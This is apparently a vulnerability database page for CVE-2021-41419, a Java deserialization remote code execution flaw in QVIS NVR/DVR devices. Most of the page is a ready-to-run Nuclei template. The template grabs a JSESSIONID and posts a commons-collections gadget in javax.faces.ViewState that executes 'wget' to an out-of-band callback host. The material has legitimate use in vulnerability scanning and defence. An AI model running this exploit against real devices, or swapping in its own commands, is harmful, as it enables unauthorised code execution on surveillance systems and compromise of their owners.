CVE-2021-41419: QVIS NVR/DVR - Remote Code Execution

日期: 2025-11-07 | 影响软件: QVIS NVR DVR | POC: 已公开

漏洞描述

QVIS NVR DVR before 2021-12-13 is vulnerable to Remote Code Execution via Java deserialization.

PoC代码[已公开]

id: CVE-2021-41419

info:
  name: QVIS NVR/DVR - Remote Code Execution
  author: me9187
  severity: critical
  description: |
    QVIS NVR DVR before 2021-12-13 is vulnerable to Remote Code Execution via Java deserialization.
  impact: |
    Attackers can execute arbitrary code remotely, potentially leading to full system compromise.
  remediation: |
    Update to the latest version or apply security patches provided by the vendor.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41419
    - https://gist.github.com/Meeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee/712ac36c8a08e2698e875169442a23a4
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-41419
    cwe-id: CWE-502
    epss-score: 0.71345
    epss-percentile: 0.98648
    cpe: cpe:2.3:o:qvis:dvr_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: qvis
    product: dvr_firmware
  tags: cve,cve2021,qvisdvr,rce,deserialization,jsf,iot,oast

http:
  - raw:
      - |
        GET /qvisdvr/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

      - |
        POST /qvisdvr/index.faces;jsessionid={{token}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        javax.faces.ViewState={{generate_java_gadget("commons-collections3.1", "wget http://{{interactsh-url}}", "base64")}}

    extractors:
      - type: regex
        name: token
        group: 1
        internal: true
        part: header
        regex:
          - "JSESSIONID=(.*)"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - http

      - type: status
        status:
          - 500
# digest: 490a00463044022033dd4368e8ec8dd907d54f84e50f04400b102f4c4a8a526ec3f690626fe237aa02207d8931f1cff824cc413f4494acf539b1a9976ff8f5cd96541feac54e6af76480:922c64590222798bb761d5b6d8e72950